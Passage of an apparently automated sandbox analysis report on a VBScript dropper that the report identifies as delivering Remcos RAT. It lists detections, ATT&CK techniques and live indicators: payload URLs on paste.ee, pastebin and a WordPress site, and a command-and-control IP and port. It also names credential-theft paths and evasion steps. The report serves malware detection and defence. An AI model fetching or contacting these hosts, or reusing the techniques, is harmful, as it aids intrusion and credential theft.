                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041A045 __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,20_2_0041A045
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041B69E GetUserNameW,20_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,20_2_00449210
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\1210\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data20_2_0040BA4D
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\20_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db20_2_0040BB6B

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-52K54M
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-52K54M
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-52K54M
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.powershell.exe.23e13f69f58.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1eb5d86a448.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.powershell.exe.19971c2ad28.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\1210\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe20_2_0040569A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information321
                    Scripting                    		Valid Accounts1
                    Native API                    		321
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		1
                    Exfiltration Over Alternative Protocol                    		1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		1
                    Bypass User Account Control                    		1
                    Deobfuscate/Decode Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol211
                    Input Capture                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts3
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		3
                    Obfuscated Files or Information                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares3
                    Clipboard Data                    		21
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		11
                    Registry Run Keys / Startup Folder                    		1
                    Windows Service                    		2
                    Software Packing                    		NTDS4
                    File and Directory Discovery                    		Distributed Component Object ModelInput Capture1
                    Non-Standard Port                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell                    		Network Logon Script221
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets33
                    System Information Discovery                    		SSHKeylogging1
                    Remote Access Software                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                    Registry Run Keys / Startup Folder                    		1
                    Bypass User Account Control                    		Cached Domain Credentials121
                    Security Software Discovery                    		VNCGUI Input Capture2
                    Non-Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    File Deletion                    		DCSync31
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal Capture113
                    Application Layer Protocol                    		Exfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Masquerading                    		Proc Filesystem2
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Access Token Manipulation                    		Network Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd221
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524804 Sample: SKMBT_77122012816310TD0128_... Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 66 pastebin.com 2->66 68 paste.ee 2->68 70 4 other IPs or domains 2->70 94 Multi AV Scanner detection for domain / URL 2->94 96 Suricata IDS alerts for network traffic 2->96 98 Found malware configuration 2->98 102 19 other signatures 2->102 10 wscript.exe 1 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        signatures3 100 Connects to a pastebin service (likely for C&C) 68->100 process4 signatures5 112 VBScript performs obfuscated calls to suspicious functions 10->112 114 Suspicious powershell command line found 10->114 116 Wscript starts Powershell (via cmd or directly) 10->116 118 2 other signatures 10->118 17 powershell.exe 7 10->17         started        20 powershell.exe 13->20         started        22 conhost.exe 13->22         started        24 powershell.exe 15->24         started        26 conhost.exe 15->26         started        process6 signatures7 82 Suspicious powershell command line found 17->82 84 Self deletion via cmd or bat file 17->84 86 Tries to download and execute files (via powershell) 17->86 92 4 other signatures 17->92 28 powershell.exe 14 18 17->28         started        33 conhost.exe 17->33         started        88 Writes to foreign memory regions 20->88 90 Injects a PE file into a foreign processes 20->90 35 RegAsm.exe 20->35         started        37 conhost.exe 20->37         started        39 RegAsm.exe 20->39         started        41 RegAsm.exe 24->41         started        43 conhost.exe 24->43         started        process8 dnsIp9 74 desckvbrat.com.br 191.252.83.213, 21, 49711, 49712 LocawebServicosdeInternetSABR Brazil 28->74 76 gratitudeseekers.com 173.231.247.100, 443, 49719 INMOTI-1US United States 28->76 78 paste.ee 188.114.97.3, 443, 49713, 49717 CLOUDFLARENETUS European Union 28->78 64 C:\Users\user\AppData\Local\...\hwcrj.ps1, Unicode 28->64 dropped 120 Self deletion via cmd or bat file 28->120 122 Adds a directory exclusion to Windows Defender 28->122 45 powershell.exe 11 28->45         started        49 cmd.exe 10 28->49         started        51 powershell.exe 23 28->51         started        53 3 other processes 28->53 124 Detected Remcos RAT 41->124 file10 signatures11 process12 dnsIp13 80 pastebin.com 104.20.4.235, 443, 49724, 49728 CLOUDFLARENETUS United States 45->80 126 Writes to foreign memory regions 45->126 128 Injects a PE file into a foreign processes 45->128 55 RegAsm.exe 45->55         started        130 Suspicious powershell command line found 49->130 132 Wscript starts Powershell (via cmd or directly) 49->132 134 Loading BitLocker PowerShell Module 51->134 60 WmiPrvSE.exe 2 51->60         started        136 Creates autostart registry keys with suspicious values (likely registry only malware) 53->136 signatures14 process15 dnsIp16 72 212.162.149.163, 2404, 49725, 49726 UNREAL-SERVERSUS Netherlands 55->72 62 C:\ProgramData\1210\logs.dat, data 55->62 dropped 104 Contains functionality to bypass UAC (CMSTPLUA) 55->104 106 Detected Remcos RAT 55->106 108 Contains functionalty to change the wallpaper 55->108 110 5 other signatures 55->110 file17 signatures18

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SKMBT_77122012816310TD0128_17311_XLS.vbs3%ReversingLabs
                    SKMBT_77122012816310TD0128_17311_XLS.vbs10%VirustotalBrowse

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    paste.ee1%VirustotalBrowse
                    desckvbrat.com.br7%VirustotalBrowse
                    pastebin.com0%VirustotalBrowse
                    gratitudeseekers.com0%VirustotalBrowse
                    www.gratitudeseekers.com0%VirustotalBrowse
                    ftp.desckvbrat.com.br8%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://oneget.orgX0%URL Reputationsafe
                    https://go.microsoft.co1%VirustotalBrowse
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://oneget.org0%URL Reputationsafe
                    https://paste.ee/d/Ga0HE/02%VirustotalBrowse
                    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                    http://ftp.desckvbrat.com.br8%VirustotalBrowse
                    http://paste.ee1%VirustotalBrowse
                    https://www.gratitudeseekers.com/wp-includes/customize/c0%VirustotalBrowse
                    https://paste.ee/d/RdlsG/0P2%VirustotalBrowse
                    http://desckvbrat.com.br7%VirustotalBrowse
                    https://analytics.paste.ee1%VirustotalBrowse
                    https://paste.ee1%VirustotalBrowse
                    https://github.com/Pester/Pester1%VirustotalBrowse
                    http://www.gratitudeseekers.com0%VirustotalBrowse
                    https://pastebin.com/raw/pQQ0n3eA5%VirustotalBrowse
                    https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txt1%VirustotalBrowse
                    https://www.google.com0%VirustotalBrowse
                    https://paste.ee/d/b5xuX/02%VirustotalBrowse
                    https://paste.ee/d/b5xuX/0P2%VirustotalBrowse
                    https://cdnjs.cloudflare.com0%VirustotalBrowse
                    212.162.149.1631%VirustotalBrowse
                    https://pastebin.com0%VirustotalBrowse
                    https://paste.ee/d/RdlsG/02%VirustotalBrowse
                    http://pastebin.com0%VirustotalBrowse
                    https://www.gratitudeseekers.com0%VirustotalBrowse
                    https://secure.gravatar.com0%VirustotalBrowse
                    http://gratitudeseekers.com0%VirustotalBrowse
                    https://themes.googleusercontent.com0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    paste.ee
                    		188.114.97.3
                    		truetrueunknown
                    desckvbrat.com.br
                    		191.252.83.213
                    		truetrueunknown
                    pastebin.com
                    		104.20.4.235
                    		truetrueunknown
                    gratitudeseekers.com
                    		173.231.247.100
                    		truetrueunknown
                    www.gratitudeseekers.com
                    		unknown
                    		unknowntrueunknown
                    ftp.desckvbrat.com.br
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://paste.ee/d/Ga0HE/0trueunknown
                    https://pastebin.com/raw/pQQ0n3eAfalseunknown
                    https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txttrueunknown
                    https://paste.ee/d/b5xuX/0trueunknown
                    212.162.149.163trueunknown
                    https://paste.ee/d/RdlsG/0trueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.microsoft.coEpowershell.exe, 00000008.00000002.2365489324.0000015ECE77E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2341736438.000001BDB1A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3016225827.000001BDBFF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2756972243.000001ABF1B4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2656723724.000001C11006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://paste.ee/d/RdlsG/0Ppowershell.exe, 00000004.00000002.2341736438.000001BDB164A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2258056949.0000015EB7A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://go.microsoft.copowershell.exe, 00000004.00000002.3083725979.000001BDC8340000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://paste.eepowershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.2283194941.000001ABE1D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2258056949.0000015EB7A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      http://ftp.desckvbrat.com.brpowershell.exe, 00000004.00000002.2341736438.000001BDB161F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16C8000.00000004.00000800.00020000.00000000.sdmptrueunknown
                      https://go.micropowershell.exe, 00000004.00000002.2341736438.000001BDB0F0F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://desckvbrat.com.brpowershell.exe, 00000004.00000002.2341736438.000001BDB161F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16C8000.00000004.00000800.00020000.00000000.sdmptrueunknown
                      https://contoso.com/Licensepowershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com;powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://www.gratitudeseekers.com/wp-includes/customize/cpowershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://analytics.paste.eepowershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://paste.eepowershell.exe, 00000004.00000002.2341736438.000001BDB164A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0142000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://pastebin.com/GACpowershell.exe, 0000000D.00000002.2750883006.000001EB653E9000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2258056949.0000015EB7A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://www.gratitudeseekers.compowershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://geoplugin.net/json.gpRegAsm.exefalse
                          • URL Reputation: safe
                          		unknown
                          https://www.google.compowershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://geoplugin.net/json.gp/Cpowershell.exe, 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ion=v4.5powershell.exe, 00000006.00000002.2889045925.000001C1774C3000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://paste.ee/d/b5xuX/0Ppowershell.exe, 00000004.00000002.2341736438.000001BDB1932000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://www.gratitudeseekers.compowershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.2283194941.000001ABE1D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2341736438.000001BDB1A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3016225827.000001BDBFF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2756972243.000001ABF1B4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2656723724.000001C11006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://oneget.orgXpowershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
